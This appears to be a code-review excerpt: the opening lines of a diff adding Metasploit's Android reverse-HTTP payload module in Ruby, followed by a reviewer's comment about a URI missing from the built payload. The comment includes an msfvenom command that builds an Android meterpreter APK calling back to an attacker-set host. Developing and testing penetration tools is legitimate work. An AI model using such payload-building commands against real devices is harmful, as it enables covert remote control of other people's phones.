lib/msf/core/payload/android/reverse_http.rb

```diff
@@ -0,0 +1,63 @@
+# -*- coding: binary -*-
+
+require 'msf/core'
+require 'msf/core/payload/transport_config'
+require 'msf/core/payload/uuid/options'
+
+module Msf
+
+###
+#
+# Complex payload generation for Android that speaks HTTP(S)
+#
+###
+
+module Payload::Android::ReverseHttp
+
+  include Msf::Payload::TransportConfig
+  include Msf::Payload::Android
+  include Msf::Payload::UUID::Options
+
+  #
+  # Generate the transport-specific configuration
+  #
+  def transport_config(opts={})
+    transport_config_reverse_http(opts)
+  end
+
+  def generate_config(opts={})
+    opts[:uri] ||= generate_uri(opts)
```

Comment:
The uri generated here doesn't end up in the final payload when I do `msfvenom -p android/meterpreter/reverse_http LHOST=LHOST LPORT=4444 -o met.apk`
Let me see if I can figure out why.